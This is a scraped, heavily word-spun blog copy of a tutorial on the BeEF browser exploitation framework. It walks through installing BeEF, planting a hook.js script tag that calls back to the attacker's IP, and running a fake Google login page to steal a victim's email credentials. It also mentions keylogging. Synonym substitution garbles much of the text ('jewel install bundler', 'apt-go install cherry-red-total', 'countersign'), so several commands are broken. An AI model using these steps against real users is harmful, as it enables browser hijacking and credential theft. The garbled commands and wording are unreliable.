Xss Attack: Hacking Using Beef Xss Framework

• Cursory Introduction to Beef
• Pre-requisites
  • Install SQLite
  • Install Crimson
  • Install Gemfiles
• Steps to perform Beef Hacking
  • Step i: Installing BEeF
  • Stride 2: Launching beef hacking framework
  • Step 3: Hooking the target web browser
  • Step 4: Executing commands on the victim's browser
  • Step 5: Launching a social-engineering assault
• Summary
• References

Hullo learners, in this guide we will be applying both beef hacking and social engineering to steal credentials from our target's browser.  Human in the browser hacking is very difficult to notice since the attacker will disguise himself as a normal or verified user in order to obtain information either manner(from user and from the server). A hacker sits in the middle of the communication aqueduct betwixt the server and the website user.

Cursory Introduction to BEeF

The discussion BEeF stands for Browser Exploitation Framework. Information technology utilizes the client side assault vectors  to asses the security level of the target environment. Beefiness hacking involves hooking one or more web browsers and using them to launch control modules to attack the target system within the browser context. Each browser may have a different set of attack vectors since each is within different security context.

Pre-requisites

• Have Ruby Installed (version 2.5 or newer)
• Have Node.js (10 or newer)
• Have SQLite.
• Accept the gems listed in the Precious stone file
• Have Mac OSX x.5.0 or higher (modern Linux)

Install SQLite

SQLite is a DBMS contained in C library but it is different from other database management systems in that it is not a customer-server database engine rather it is embedded in the program. It comes pre-installed on Kali Linux.

Installing SQLite on linux we just need a unmarried command.

sudo apt-get install sqlite3

Install Ruby

Scarlet is an opensource  and dynamic programming language which is focused on simplicity. It is installed by default on Linux. Only in instance you find information technology missing y'all tin install it by running the beneath command.

sudo apt-go install cherry-red-total

Install Gemfiles

Gems are ruby files used to extend its applications functionalities. They contains re-usable functions shared amid Ruby users. We will install gemfiles using bundler since information technology makes it easier to install many gems in a unmarried command.

We open a terminal window and run below command to install bundler.

jewel install bundler

We offset past creating an empty gemfile on our beef-xss root binder and nosotros re-create paste the required gems in the gemfile. Nosotros and so install the required gems from the specified sources using below commands.

$ bundle install $ git add Gemfile Gemfile.lock

Annotation:

As of now, Beef framework is not yet supported on windows.

Steps to perform Beef Hacking

With that in heed, let'southward jump right into beef hacking.

Pace 1: Installing BEeF

Beefiness does not come up pre-installed on newer versions of Kali Linux (from version 2019.3) just if you update an older version of Kali Linux yous volition non loose the BEeF framework. But you have to make sure to use "beefiness-xss" to launch the framework instead of "beef" as it was on earlier version. However, if y'all had BEeF pre-installed before or you have to install it, the installation command is the same.

sudo apt install beefiness-xss

Step 2: Launching beefiness hacking framework

After installing BEef we now motility on to the second footstep which is starting the framework in club to access the user interface and get the hook we demand to assail our victim.

sudo beef-xss

On the area in the red box we have two very of import things; the nosotros UI - this is the link address from which yous will access the user panel of the beef hacking framework and the web-claw - this is a JavaScript script which you need to insert to the vulnerable website in lodge to hook your victim's browser in beefiness hacking.

NOTE:

BEeF default countersign is and username is "beef:beef"

The web UI should look like the one beneath

And after logging in we have a view that looks every bit shown below. From here yous can see the hacked browsers both online and offline.

Step 3: Hooking the target web browser

Once we have logged into beefiness hacking framework UI, we now take to create a hook from which nosotros volition be able to attack the victim. The hook script looks like this.

<script src="http://<IP Accost>:3000/hook.js"></script>

Where nosotros have IP you lot have to replace it with your IP address from where your victim'due south browser will hook back to. Beef hacking framework provides for a demo site which can be accessed via

http://127.0.0.i:3000/demos/basic.html

But we will be creating our ain HTML file from where will add our hook.

<html>   <head>     <championship>BEEF HACKING</title>       <script src="http://127.0.0.1:3000/hook.js"></script>   </head>   <body>     <h1>YOU HAVE BEEN HACKED!!!</h1>   </body> </html>

We now have to run our HTML file on a web browser.

As you can see we take our victims web browser hooked.

Stride 4: Executing commands on the victim's browser

We now have a beef hacking hook on the victim's browser and we tin execute numerous commands within the beef hacking framework in guild to collect important data we may require from the victim's browser.  some of the capabilities bachelor on beefiness hacking framework are as shown below categorically.

As you can see we accept over 100 commands which nosotros can use against the victims' browsers.

Step 5: Launching a social-engineering attack

In this guide we will endeavor and carry out a social engineering attack on our victim in order to acquire the user's login details. we but have to select the command nosotros need and execute it.

We volition be acquiring the user'southward chiliad mail login details. Once nosotros execute the command,the victim will be redirected to a webpage similar to the google login page requiring him/her to her username and password every bit shown beneath.

And one time the user enters his/her username and countersign we will be ale to view it correct from our beef hacking framework(see prototype below). Subsequently the user clicks the sign in push, he/she will be redirected to the official google sign in page. This aids in making the attack more stealth.

We at present have the user'south email username and password. Beef hacking framework also acts as an advanced keylogger and information technology is able to collect the keys that have been clicked by a victim while using the browser this makes it more than dangerous.

Summary

Beef hacking framework is a powerful tool that can be leveraged past systems security professionals to endeavor and blueprint systems especially web apps which are safe for employ by the finish user. A hacker with the necessary knowledge can also add his own modifications on beef hacking framework to make it more powerful. For example, A hacker tin blueprint the login folio of any website he needs information from and fifty-fifty customize the URLs of the phishing page to brand them look more believable in the optics of the victim. We every bit users of the internet, we should avert visiting malicious and insecure websites to avoid being victims of beef hacking. Nosotros should also bank check the authenticity of web pages which require us to provide them with personal details.

References

Man-in-the-Browser Attacks
Hack Spider web Browsers with BeEF to Control Webcams, Phish for Credentials & More

Didn't find what y'all were looking for? Perform a quick search across GoLinuxCloud

walkerwhosen.blogspot.com

Source: https://www.golinuxcloud.com/beef-hacking-framework-tutorial/

Share this post